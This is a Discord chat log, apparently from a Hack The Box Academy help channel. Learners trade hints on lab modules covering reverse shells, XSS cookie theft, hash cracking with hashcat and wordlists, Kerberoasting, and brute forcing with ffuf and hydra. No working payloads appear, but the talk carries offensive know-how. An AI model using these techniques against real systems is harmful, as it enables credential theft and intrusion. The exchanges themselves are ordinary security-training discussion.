hm still no change, f it. Im restarting it, lol

#

watch it work on the first try xD

#

and yup, now it works... sorry for the disturbance xD

raven cairn
warm kernel
#

when in doubt, just restart!

raven cairn
placid quest
#

@raven cairn since u wanted to transfer the file with Invoke-Webrequest u would need to use powershell

rustic sage
#

I'm pretty sure you can just run powershell

#

but don't ask me Unix/Linux all the way

raven cairn
#

Oooooh ok

granite patio
#

Can someone help me with precious? I've been trying for like 8 hours and decided to finally find a write up and a video, they're doing exactly what I tried and it's working for them but not for me

raven cairn
granite patio
#

Is that a channel I should be posting in?

raven cairn
#

yes

thorn urchin
#

yeah this channel is for discussing academy modules

granite patio
#

Huh I don't see it

raven cairn
#

It's there but I think you might need to verify

#

I think the command is ++verify in bot commands

granite patio
#

Got it, thanks!

lethal atlas
#

hello everyone.

raven cairn
#

Wassup

#

You changed your pfp 😭😭😭

vital adder
#

nooooo you remove the cat

raven cairn
#

The cat was cute

lethal atlas
#

LOL

#

That cat is the devil. Constantly tormenting my other cat and bring me live animals, then letting them go in my house

quasi bone
#

nubee question, do we get to use Kali Linux in the academy? And Blurp Suite? Tnx

raven cairn
lethal atlas
raven cairn
#

No blurp suite pro 😭

#

But blurp suite pro is not necessary

lethal atlas
#

They both have pros and cons. I can use some tools more efficiently in one over the other. But it just depends.

#

For instance, I cannot get some gdb add ons to work but they work fine in Kali

raven cairn
#

Interesting but your opinions are now invalid cuz you dont have the cat profile pic

#

🤣

lethal atlas
#

whats up @tulip grove

potent ermine
#

Hey guys I'm on the Bind shells lesson. I connected via ssh to the target and set up the listener, and entered the line to generate the shell. However, on the attack side, I only see the text output. Did I miss anything?

image.png
ornate sparrow
#

Would someone be willing to help a newb attempting to get through the Starting point?

burnt stone
ornate sparrow
#

Starting point, tier one, box 3. Following walkthrough, the instructions say to use wappalizer and you will see that its using PHP. I get all the other info but PHP doesnt show up. Oh well, moving on. Walkthrough says to use use this string:

#

echo {target Box IP here} thetoppers.htb" | sudo tee -a /etc/hosts

#

But Im not seeing a result in my terminal. Additionally, all instructions after this fail.

#

Sorry, I see what your saying. Sadly I cant seem to access the starting poiont

thorn urchin
ornate sparrow
frigid monolith
#

Can anyone give me a nudge on the ad assessment part 1?

#

It's asking for clear text creds for another domain user. Does this mean any other we uncovered or a specific one for this module?

spring sigil
thorn urchin
frigid monolith
#

I assume they don't mean kerberoast then

potent ermine
rustic sage
#

hello there! i am at the XSS module, doing the phishing page.. i make the login page fine, start up the PHP server, the encoded phishing URL gets sent, but there is no movement on the side of creds.txt..

i would appreciate any help very much
https://academy.hackthebox.com/module/103/section/984

ornate sparrow
spring sigil
potent ermine
quasi bone
#

@lethal atlas thank you!

quasi bone
warm kernel
rain leaf
#

how do i get access to talk in the other chats?

thorn urchin
#

verify your account

#

the welcome channel isnt just for show

warm kernel
#

this is taking forever, does anyone have the answer they can ship me in private?

image.png
#

after verifying my cmd is correct of course... but this is taking so damn long >.>

lethal atlas
warm kernel
#

yeah

lethal atlas
#

how did I know lol

#

That module took forever

warm kernel
#

8 char all chars and numbers... why do they choose passwords that take forever to crack... watch the machine timeout before its even done ./facepalm

lethal atlas
#

which question are you on

warm kernel
#

Hash found, and used in the cmd

SPOILER_image.png
#

i put it in crackstation in the hopes its a standard one... but alas its not...

lethal atlas
#

wait that is foorprinting module

warm kernel
#

yeah

lethal atlas
warm kernel
#

yeah, thats how I got the hash

rustic sage
#

What is the john/hashcat command you're running?

lethal atlas
#

im confused then. whats the question

rustic sage
warm kernel
#

here the cmd

SPOILER_image.png
lethal atlas
#

my bad.

warm kernel
#

more like its going to take 20 hours...

rustic sage
#

you're trying to guess the password character by character for 8 characters

#

just use a wordlist

lethal atlas
#

yep

warm kernel
#

I did

#

in the msfconsole

#

no results

rustic sage
#

you don't know the password is 8 characters, so why are you assuming it is?

lethal atlas
#

your hashcat is all wrong

warm kernel
#

just from the lesson, im implying

rustic sage
#

nononononoo

#

that is why it's taking forever

warm kernel
#

copy pasted from the lesson, so they are wrong as well?

thorn urchin
#

oof assuming the example is the same situation as the assessment

rustic sage
lethal atlas
rustic sage
#

the IPMI password isn't a default

warm kernel
#

im going off of this

image.png
rustic sage
#

yes that is for the default password

#

the IPMI password for this lab isn't default

warm kernel
#

those 2 default passwords dont work. And the wordlist mentioned in msfconsole doesn't return anything either

rustic sage
#

and you can't just assume it is or else you'll be stuck in this waiting game for a brute force attack that might not work

#

you have the hash

#

you should use wordlists to crack it

#

Not all wordlists are the same😉

warm kernel
#

well they could put in a darn hint in there to avoid wasting peoples live/time ./facepalm... I tell you sometimes I question the value of these lessons...

lethal atlas
#

but rockyou rocks

warm kernel
#

rockyou is another that ll take forever...

thorn urchin
#

you gotta learn to be able to adapt from just rote memorization of the material to actually prove you understand it

rustic sage
#

rockyou won't take forever

thorn urchin
#

its a very very common theme amongst the whole course

lethal atlas
#

it took less than 1 minute to crack

rustic sage
#

also @warm kernel it says in the module next to that command In the event of an HP iLO using a factory default password

warm kernel
#

the others I've just roughly followed and it was enough though... this isn't hacking, its just a lesson... ffs this pisses me off, such a weak machine and so many options for just a lesson. Very ineffective if you ask me

thorn urchin
#

I think your viewpoint is pretty warped

#

this is indeed true to life hacking

lethal atlas
#

I felt this module tied together with broken auth and password attacks very well.

thorn urchin
#

copy pasting from tutorials only gets you so far, you have to actually understand the content and know how to properly apply it

lethal atlas
#

I guess its all how you read it. I never once thought to attempt to blindly brute force the password

#

I instantly went to rockyou

thorn urchin
#

There are later modules that will actively be harder if you use the rote method they teach instead of synthesizing and utilizing lessons from prior modules to do better.

warm kernel
# thorn urchin this is indeed true to life hacking

I am a junior pentester already employed, im doing this to add to other skill sets, im not here to waste time brute forcing lists. This is supposed to be a lesson. Ill apply proper techniques on a box/pentest, not lessons. Not sure I agree with your view, time is short, and wasting it on ineffective things for lessons isn't the way to go about it

rustic sage
lethal atlas
#

or maybe the lesson is to teach you a method and learning it may save you time in the future? just my thought

thorn urchin
#

Well im more optimistic about my future employment prospects now

warm kernel
#

yeah, im venting on the lesson though

rustic sage
#

just use a wordlist crack the hash and move on

warm kernel
#

pretty much yeah

spring sigil
rustic sage
#

it is very true not every lesson is copy/paste. Especially if you're on the CPTS path (which I assume you are) you will have to learn and understand the concepts and apply them. Future modules aren't copy/paste, it's apply what you learned research more if needed

lethal atlas
#

just an fyi but the average time to crack an 8 character password is 84 days.

spring sigil
warm kernel
lethal atlas
#

could be. My point is that even with a super computer, the odds of cracking a password without using a wordlist in the time allotted has got to be .000000000000000000000000000000000000000001

warm kernel
#

I just assumed it would have been at the start of the search like other labs do

rustic sage
#

never assume😉

lethal atlas
warm kernel
#

yeah I already got it, thanks!

raven cairn
#

Tysm

rustic sage
# warm kernel yeah I already got it, thanks!

Just a FYI. If you were able to tell that the IPMI was HP iLO, you're assuming it's using default creds, AND you weren't able to extract any hashes then you'd use that hashcat command to attempt to brute force the default password, but yes this will take a lot of time

rustic sage
warm kernel
#

sorry for the rant gents 😦

rustic sage
#

nah you're good

#

it does get frustrating at time, but you learn from it🤷‍♂️

#

just wait until you get to Password Attacks😊

warm kernel
#

lol, at this point, im not assuming anything with these labs

#

would have saved me alot of time, ahah

spring sigil
#

Feel free to dm me @potent ermine if that doesn't clear it up

lethal atlas
#

speaking of... Im on the section "Pass the Ticket (PtT) from Linux" and I cant ssh in with the creds they provide.

spring sigil
lethal atlas
#

hmmm maybe there is an issue

spring sigil
#

ah, mine didn't get as far as to ask for the password

rustic sage
#

The username for the domain is david@inlanefreight.htb

lethal atlas
#

that worked. Very confusing

rustic sage
#

yeah I got me at first too. Just remember it's a domain user so you need to include the full domain

lethal atlas
#

typically that would have been the command.

potent ermine
odd harness
#

Hi is anyone a good hacker

pastel ginkgo
#

suspect as fuck gifs

#

@sharp cove @novel matrix @languid dawn

raven cairn
#

Sup HellsCrypt

#

Have you finished that AD module yet?

pastel ginkgo
#

yeah

raven cairn
#

Im getting to the skills assessment and Im scared

#

💀

#

Hope it is not too difficult

pastel ginkgo
#

lol I literately went back and redid all my notes

#

I call that one the midterm

#

Soo should fluff be only getting errors and finishing 100k request in 1 sec?

novel matrix
shut matrix
#

Is this the place to post questions?

raven cairn
#

B/L???

raven cairn
odd harness
#

HtB finder

#

I need to find a hacker

shut matrix
#

Wonderful my question is simple, I'm going through Windows Fundamentals

pastel ginkgo
#

lol that module is a beast

shut matrix
#

I'm into examining services using sc

#

When I pass sc qc wuauserv

#

Into PowerShell

#

I'm not getting anything returned

pastel ginkgo
#

Are you in a reverse shell

shut matrix
pastel ginkgo
#

that could be why

#

I had a hard time getting my reverse shell to always give output

#

I think it doesn't get caught because its not sent as standard out but as standard error which we don't send back on the shell

#

so either your command is formatted wrong or you can see if you change the output to a txt and read that

shut matrix
#

I'll give that a try

raven cairn
#

Stupid question. What tool would I use to log in??

hehe.png
#

There are so many different tools introduced in this module that it hurts my head

rustic sage
#

try them all 🙂

raven cairn
#

lol

rustic sage
#

see what works and what doesn't and why

shut matrix
raven cairn
#

Ok I'll try harder haha

rustic sage
#

I really haven't done the AD modules yet so I can't help lol try RDP, SSH, WinRM whatever is open

shut matrix
#

lmao

#

I got it

#

I had to be in CMD

#

Rather then PS

pastel ginkgo
#

I finished the Ad Module Sunday so its still fresh lol

raven cairn
#

How long did it take for you to do both Skills assessments?

thorn urchin
#

for me AD1 was maybe an hour or two, Idr. but AD 2 was 8 hours.

thorn urchin
pastel ginkgo
#

3 days for me lol

#

a day for 1 and 2 for the 2nd

raven cairn
#

Oh god

thorn urchin
#

Its unarguably the hardest assessment in the whole module Ive done so far

#

but also the best

raven cairn
#

AD is a weak point for me, so it is good to get out of my comfort zone

thorn urchin
#

and ftr im at 76.5% of cpts course completion

#

Im sure one of the latter ones might be tougher

pastel ginkgo
#

just be happy the module after AD is easy but a total stinker and you get to push a button 300 times till the flag drops like a shitty WoW boss

raven cairn
#

Lol i dont do the modules in order

#

💀

keen raft
#

what module will help me to crack passwords

thorn urchin
#

but be warned, its def one of the worst and most infuriating modules

#

I believe theres also a hashcat specific module as well, but not tied to the courses.

keen raft
#

im a complete beginner what would you reccomend to start me off

thorn urchin
#

complete beginner in password cracking or complete beginner in general?

pastel ginkgo
#

Do cracking into htb then Basic toolset if your totally new

thorn urchin
#

if in general I def recommend just flowing the CPTS course, but if you need some linux experience Id do that path first

keen raft
#

ok thanks

sly tapir
#

could someone throw me a hint on this file inclusion skill assessment...im at ||the admin panel|| am i in the right place?

lethal atlas
sly tapir
thorn urchin
#

yeah youre in the endgame now

pastel ginkgo
#

so did the academy site go down or me running ffuf get me banned by the ips

#

as the fuff module said to run ffuf on it and now I cant reach the site lol

#

its back, im convinced it blocked me lol

brisk geode
#

Module: Cross Site Scripting/Session hijacking

Qus: Try to repeat what you learned in this section to identify the vulnerable input field and find a working XSS payload, and then use the 'Session Hijacking' scripts to grab the Admin's cookie and use it in 'login.php' to get the flag.

i followed everything mentioned on the page but aint getting a request on the php server

fervent vessel
#

Hi all, im doing DOCUMENTATION & REPORTING module, you know which tool is using in the Report example to paste code lines?, im trying to use latex but pasting code is so frustrating.

#

I cant paste de image but is the sample report in the resource box

lament hollow
#

This may be a dumb question but... The AD Enumeration and Attack module references Snaffler which is a C# tool but it never actually talks about compiling the program which does not come pre-compiled. I've tried to poke around compiling from the linux attack host with mono before transfering as well as transfering the source to a Windows host and compiling with MSbuild but both had failures.

How do people compile C# programs that use .sln and .csproj files (not just a standalone .cs) when you don't have VSCode available?

kind turret
iron plaza
#

can anyone help me out with the Introduction to Windows Command Line (User and Group Management)? got one question relating to domain user

fringe arch
#

I found all except that one, i used msf too. But i do not have any clue. Can u help me for hint.

Edit: 😩 after a lot of time, i got it.

tidal mango
#

Finished AD1... that was a bear! I can't imagine 2 will be any easier....

vital adder
vital adder
fallow ginkgo
#

Any tips for making ||Examine the target and find out the password of the user Will. Then, submit the password as the answer.|| go along a bit quicker? The provided hint doesn't work (||I'm assuming they want me to riff off of the password given with a mutated list but not sure||)

vital adder
#

which module and section are you on?

vital adder
# keen raft im a complete beginner what would you reccomend to start me off

if you are new to this i recommend you give both of these a check to see what you should and need to learn first
https://www.youtube.com/watch?v=0vu_Hs4N8B8
https://www.youtube.com/watch?v=lhz0-qAQlBM

YouTube
0xYaoi
From Skid to APT - Intro to hacking

Introductory video on getting into hacking and cybersecurity.

▶ Play video
YouTube
The Cyber Mentor
How to Be an Ethical Hacker in 2022

Sponsor: https://go.intigriti.com/thecybermentor
Blog Post: https://tcm-sec.com/so-you-want-to-be-a-hacker-2022-edition/
Academy: https://academy.tcm-sec.com

Timestamps:
0:00 - Introduction
0:53 - Intigriti Sponsorship
1:55 - Building a Foundation
2:10 - Important Notes
5:37 - Basic IT Skills
8:28 - Networking Skills
12:38 - Linux Skills
17:04 ...

▶ Play video
brisk geode
vital adder
#

i'm pretty sure it is but let me double check

#

yep it is one of the ||example payload|| would work for this

fallow ginkgo
iron plaza
vital adder
vital adder
dapper temple
#

If you purchase cubes do you get the cubes automatically credited in you account?

vital adder
#

yep if you buy the cubes it should be added instantly into your account

#

https://academy.hackthebox.com/achievement/453129/167
nice module but the holding ctrl and backspace to delete a whole word in powershell on the domain controller is kinda F so that's a bit annoying for long command

Completed Introduction to Windows Command Line

As administrators and Pentesters, we may not always be able to utilize a graphical user interface for the actions we need to perform. Introduction to Windows Command Line aims to introduce students to the wide range of uses for Command Prompt and PowerShell within a Windows environment. We will cover basic usage of both key executables for admin...

rustic sage
#

fuzzing

red obsidianBOT
#

There is no flag here. Get back to hacking!

stiff moon
#

yo quick question. a couple of weeks ago i won a silver annual voucher and my question is will i keep all the modules i have done and unlocked after the voucher runs out?

rustic sage
stiff moon
tribal quail
#

Is there a list of retired machines that use part of a module? Like the file inclusion module is fun but I would love to have practice of them on machines and not on the too easy examples in the module.

solar granite
#

Also there's ippsec.rocks

tribal quail
#

Ippsec rocks could indeed be handy. Seems to be what I was looking for

dawn forge
#

Hello everyone, Does anyone tried Deserialization module in HTB Academy? Need a little hint for the last flag :))

rustic sage
rustic sage
#

Greetings!

#

Anyone working around the meterpreter module?! Been stuck for a while 😦

#

OMG finally finished Password Attacks🥳 Learned so much but damn that took time

lethal atlas
rustic sage
rustic sage
candid zephyr
#

Hey this is a stupid question - I redeemed a voucher into the Academy but seem unable to actually do anything with it haha. It's nbd but wondered what's the point of such a feature? Is it purely for the CPTS? If so maybe I'll just have to add a bunch more and commit.

frozen lava
#

HELLO

gusty fulcrum
#

Hello

sly reef
#

can someone help me out with windows commandline introduction module?

unique valve
thorn urchin
jagged acorn
#

Hi

thorn urchin
#

contact support

sharp depot
#

Oh im so dumb :DDD

#

I got it

rustic sage
#

I just finished the Learning Process module and I must confess, it is a gem, a masterpiece, a module of knowledge, wisdom and understanding. My mentality has undergone series of changes for the past 2 weeks as I took notes. Kudos and thank you to HTB and the writer(s) of that module. You have given me an invaluable information I can go back to study often and not get bored. To any who'd take the module, I recommend taking notes (even though it's not infosec technical), actually writing because writing causes thinking, it convinces your mind to know you're not wasting your time and also absorbs the information like foam to water.

My 2 cubes.

#

You can do this!!

pastel ginkgo
#

For the ffuff assessment whats the format it wants for the first answer? I've tried just the name of the subdomain as well as xxx.academy.htb // http://xxx.academy.htb

#

it wont take any of the 3 subdomains I found in any of those formats

thorn urchin
#

it wants all, just the subdomains, seperated by a space

#

xxx yyy zzz

pastel ginkgo
#

awesome thanks, that should be noted as a hint

rustic sage
pastel ginkgo
#

Yeah but when they want a specific format they usually specify

thorn urchin
#

it should say Only write the sub-domain names

#

as well

pastel ginkgo
#

I tried listing them all with , between each at first

thorn urchin
#

plural helps

sly reef
#

hey guys, final assesment is asking for this: To grab this final flag, what user account has many Event ID (4625)

#

im running: Get-WinEvent | Where-Object {$_.ID -eq "4625"}

#

but i am unable to get the name outputed. Any idea?

night pier
#

Anyone finish the Attacking Authentication Mechanisms skill assessment? I'm at the point where I have to send first name last name email and password, I craft my jwt token but it's not accepted.

thorn ingot
#

What does '^ii' indicate?

lethal atlas
thorn ingot
lethal atlas
#

That does not help. In fishing, soccer, knitting, it means nothing. In Bash, or python, or something else it may have different meaning

thorn ingot
#

In bash

lethal atlas
#

there we go. In Bash the ^ is used for xor.

#

but as far as ^ii I havent seen that before.

#

can you post a line of the code, maybe it will help identify the purpose

thorn ingot
#

dpkg -l | grep -c '^ii'

#

From my understanding, this counts the packages installed but doesn't count the first line

lethal atlas
#

in that case it is looking for the string ^ii in the list of packages

#

it wont count them but it will list them

#

now if you add | wc -l it will count

high totem
#

Hey, can anyone help me with Credential Hunting in Linux in Passwords Attacks? I don't get what should I do. I have the username in the task, but the whole section is about the local credential hunting, not remote, so I don't think the point is to spam the target with crackmapexec. In the hint there are credentials for other user, but they do not work for the target. What am I missing?

thorn ingot
thorn ingot
candid zephyr
lethal atlas
candid zephyr
#

so it'll only list something if the line begins with ii

lethal atlas
#

ty @candid zephyr

#

regex still gets me

lethal atlas
candid zephyr
#

if you exclude the ^ it'll show every instance of ii in the file.

thorn ingot
lethal atlas
#

ahhh

thorn ingot
candid zephyr
thorn ingot
#

Thank you for clarifying things @lethal atlas

lethal atlas
#

I only helped a little, @candid zephyr brought us home.

frigid monolith
#

Could anyone give me a nudge on ad assessment part 1? I'm looking for the other user with a clear text password. I tried snaffler and got nothing.

flint helm
#

At AD Enumeration & Attacks - Skills Assessment Part II question 8 (Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.) I've found hashes with lazagne but I've been unable to login with them or crack any. dcsync and kerberoasting didn't work and I haven't found anything with snaffler either.

flint helm
thorn urchin
modest token
#

Has anyone completed the ATTACKING COMMON APPLICATIONS Other Notable Applications skill assessment? I know that the vulnerable app is ||WebLogic ||I even found the exploit for it on exploitdb and I think it's running correctly, but I can't figure out what reverse shell to use on it. I've basically gone through all of the reverse shells on revshells.com and none have stuck. Can anyone give me a nudge in the right direction? 🙏

high totem
#

Ok, I've basically gone through like 3.5k passwords for Kira. That's more or less max I can do in 90 the lab is giving me, before changing the IP. What am I doing wrong? I generated the mutated password list using the provided rule and LoveYou1 from the hint. I took every password that was even remotely similar to "love" from the 94k passwords I get when running this rule on the password set provided in the zip. Still hydra doesn't find anything. Why is accessing the machine taking me more time than the task itself? I've been stuck for a few WEEKS on that!

compact apex
#

Hey I have a question, I try to nslookup the target for the active domain enumeration module in info gathering but I always got the "server could not be find" someone can help ?

lethal atlas
lethal atlas
compact apex
compact apex
lethal atlas
#

dm me and lets work thru your commands

compact apex
#

ok

swift osprey
#

Hello

Anyone have suggestions about this?

I have some text file in desktop, I want to open the text file in my kali terminal directly by double clicking it

Is that possible?

Instead of opening terminal and typing cat <file name> , I want the text file to open in terminal directly

thorn urchin
marble raft
#

Hi guys, need some help on Type Filters section of the File Upload module.
Managed to bypass the filters and upload the shell but trying to acess it i get an error

The image cannot be displayed because it contains errors.

thorn urchin
thorn urchin
#

also you got some spoilers in there

marble raft
marble raft
thorn urchin
#

payload looks good, not sure the issue. Maybe drop the : from your filename, I dont think thats needed and server may be parsing it weird.

compact apex
modest token
marble raft
thorn urchin
#

interesting, I def used jpg on mine, but whatever works

lethal atlas
thorn urchin
#

I also had a nearly completely different strategy than what was taught in the module as well, so I may have simply stumbled across a combo that worked easier. Bout half a dozen combos actually

lethal atlas
#

has anyone done the PTT from linux portion of password attacks?

rustic sage
lethal atlas
shut matrix
#

Hey all just a quick question on nmap

#

I'm working through the enumeration module

#

One of the questions is to enumerate all ports and their services

#

I am using sudo nmap 10.129.2.28 -p- -sV --stats-every=5s

#

My question is how long should a scan take

#

Full a full scan

rustic sage
#

nmap scans can take a long time especially if you’re scanning all ports. It really depends on a lot of factors

within that module you will learn a lot of techniques to speed it up

shut matrix
#

Right, as for this part should I just let it run

rustic sage
#

for now add -Pn -n —disable-arp-ping

#

that will speed it up a little bit

shut matrix
#

Alright ty

#

Would my connection also impact speed of nmap

shut matrix
rustic sage
#

-Pn basically says don’t ping the box/port assume it’s up. This option alone will save a lot of time

pastel ginkgo
#

Is it possible to brute force a login page using ffuf rather than Hydra?

rustic sage
#

UDP always takes forever so good luck with that one😂

rustic sage
pastel ginkgo
#

I'm going to give it a try I finished the ffuff module earlier today and am on the brute forcing one thats taking forever with hydra

raven cairn
#

Could I have some help on the Active Directory Skills assessment 1?

#

|| I am trying to perform Kerberoasting. I transferred PowerView.ps1 to the target. And I am trying to extract TGS tickets. Not having luck with this method. I've also had issues by getting the tickets into memory and extracting them with mimikatz. Wondering what I am doing wrong ||

#

Should be pretty straightforward after I crack the hashes with hashcat

thorn urchin
raven cairn
#

Doing this module before Pivoting, Tunneling and Port Forwarding was a bad idea

#

haha

thorn urchin
#

I mean it never suggests you do it that way, its just my preferred method for most of the module. less files dropped on the targets

#

it burned me a little on one step of ad 2 but meh, that's life

#

finding exactly one scenario within two ad assessments where mimikatz outperformed proxying impacket tools is perfectly good enough in my books lol

raven cairn
#

Lemme show my issues with PowerView

rustic sage
#

you should do the modules in order that’s what they were designed for😉

thorn urchin
raven cairn
#

Oh ok

#

That makes sense

thorn urchin
#

I think each input command into the webshell is actually spawning a new process, so after you import module itll immediately forget about it

raven cairn
#

Cool. i'll try that out

solar glen
#

Hi guys,
I'm studying at GETTING STARTED - Knowledge Check (GetSimple CMS 3.3.15),
I'm answering the first question "Spawn the target, gain a foothold and submit the contents of the user.txt flag."
Now I have a foothold, and when I type sudo -l, it shows up like the picture.
I have a question that is (ALL : ALL) NOPASSWD: /usr/bin/php
Is it possible for all users to execute the sudo command while in the /usr/bin/php directory?

image.png
sly tapir
#

im doing this session security module: XSS (netcat) .... my output is waaay different than the example....anybody else have this issue?

image.png
raven cairn
raven cairn
sly tapir
raven cairn
#

Does it work tho?

#

Cuz thats what matters most

sly tapir
#

yea i mean the XSS outputs to netcat...so it does work...i just cant follow along because i dont have the key it output

raven cairn
#

You could also try doing it on pwnbox

sly tapir
#

yea you right haha

raven cairn
#

Also if I recall correctly think you save the cookie

sly tapir
#

yea it has me decode it in the console

safe talon
#

Good Morning, I'm doing the introduction to nosql injection module and I'm hanging at the 2nd Skill Assessment II (https://academy.hackthebox.com/module/171/section/1692). I tried everything I leaned in this module, but nothing works. I tried every input filed, I think the login is the only input field which is vulnerable. It would be awesome if someone can give me a nude. What I noticed is that the backend is python not php or nodejs.

HTB Academy : Cyber Security Training

Log in to HTB Academy and continue you cyber security learning

vagrant ermine
#

Do more people have problems with the Three: very easy box?

#

I cant find the domian s3.thetoppers.htb with gobuster.

silent mulch
#

Hello All,

I am trying to improve my python scripting and automation skills by automating some of the tasks, I wanted to ask if someone has already done that using HTB Academy modules or if that will be a good idea to work on?
If not, can someone please help me with additional suggestions?

#

I am basically planning to pick up tasks in the modules, first complete them manually, then automate them using python.

vital adder
vagrant ermine
#

I got it it worked with something someone already explained. Sorry

#

But is it possible that the website no longer runs with php

vital adder
sinful falcon
#

Anyone avalaible for Attacking Common Services - Hard please ?

silent mulch
#

:/ okay

vital adder
vital adder
sinful falcon
vital adder
#

yeah i got no note what wordlist i use for some reason but rockyou should work

#

also shoot me a dm on what you are brute forcing

sinful falcon
spring sigil
rotund umbra
#

hi

#

i am new

solar glen
spring sigil
#

Nice!

#

What exactly am I doing wrong here? Searching the error on google wasn't very helpful either

image.png
vital adder
#

use single quotes

spring sigil
#

Same issue

vital adder
#

oh wait i forgot kali is using zsh shell

#

only bash have issue with special character

#

you got a connection issue

#

check if your target is still alive and the vpn is still working

spring sigil
#

i'll try resetting the target again

#

somehow it works now...:D

cobalt prism
#

Hey guys, getting stuck at exercise in bash script

#!/bin/bash

var="8dm7KsjU28B7v621Jls"
value="ERmFRMVZ0U2paTlJYTkxDZz09Cg"

for i in {1..40}
do
        var=$(echo $var | base64)
        
        #<---- If condition here:
done

Need to answer this question

Create an "If-Else" condition in the "For"-Loop that checks if the variable named "var" contains the contents of the variable named "value". Additionally, the variable "var" must contain more than 113,450 characters. If these conditions are met, the script must then print the last 20 characters of the variable "var". Submit these last 20 characters as the answer.

Can anybody help? My Initial thought is to write something like that, but no correct answer is printed sadCat

#!/bin/bash

var="8dm7KsjU28B7v621Jls"
value="ERmFRMVZ0U2paTlJYTkxDZz09Cg"

for i in {1..40}
do
        var=$(echo $var | base64)
        if [[ ${#var} -gt 113450 && $var == *"$value"* ]]
        then
          echo $var | tail -c 20
        fi
done
```
Thanks in advance!
rustic sage
#

how can i update the rank?

rustic sage
rustic sage
#

a linux appeared in my task manager what can it be

rustic sage
#

@rustic sage the modules dont intefer with the rank?

#

i started from a short time ago , i started using this like a week ago , i completed the

  • Metasploit
  • Introduction to Network
  • Sql injection fundamentals

But my ranks stills very low :(

rustic sage
latent sage
latent sage
sly kelp
#

Hello I am having trouble accessing Web serviced and API attacks module. There is a particular question when i access it the whole academy websites stops to respond. Everything else is working fine but due to that i can't complete the module.

lethal atlas
#

Holy hell. Finally finished the PtT section of password attacks and I apparently found an unintended way of getting the flag from LINUX01. Interesting section to say the least

rustic sage
#

Someone can help me with this error

#

Received content contained invalid JSON!

#

And this is the line of code, it's in the WEB request, POST

runic rampart
#

Good evening! Can anyone help with Introduction to Deserialization Attacks-Skills Assessment?

crisp remnant
#

Hey guys can i ping anyone about the xss module, i have something that should be working , but it doesnt

lethal atlas
lethal atlas
rustic sage
lethal atlas
#

still not working?

cobalt prism
lethal atlas
#

@cobalt prism feel free to dm me

wispy fjord
#

hi

lethal atlas
#

hello

wispy fjord
#

any idea how to get the different types of roles?

lethal atlas
#

You do stuff on the main HTB site

#

the more you do there, the higher your rank here.

wispy fjord
#

There's no field for "account identifier" in settings for me

#

Nvm I was on the academy settings

proud pine
#

Man, I had been avoiding learning manual SQL injection for the longest time, but the training module was actually super easy.

#

I don't think that deserves to be qualified as 'medium' lol

wispy fjord
#

meanwhile me here getting confused on the "learning process" module

pastel ginkgo
#

For the buiteforcing module Service Login assessment, for the "user" do they mean ||harrypotter|| ??? As thats the only name i've found during the previous skills assessment.

thorn urchin
pastel ginkgo
#

This module has been kinda confusing in random parts as far as question formating

#

im not sure if im supposed to be bruteforcing the username or the password or both

#

like the hint says to add more info am I supposed to go to the harry potter wiki to get more info? lol

proud pine
#

It's... definitely not the best module lol

thorn urchin
#

yeah just the name works

#

but I definitely hate that it requires information from a previous section to proceed

pastel ginkgo
#

I feel like the other module that had a ton of hydra is way better than this module lol

#

Would be cool if they expanded it on using ffuf to brute force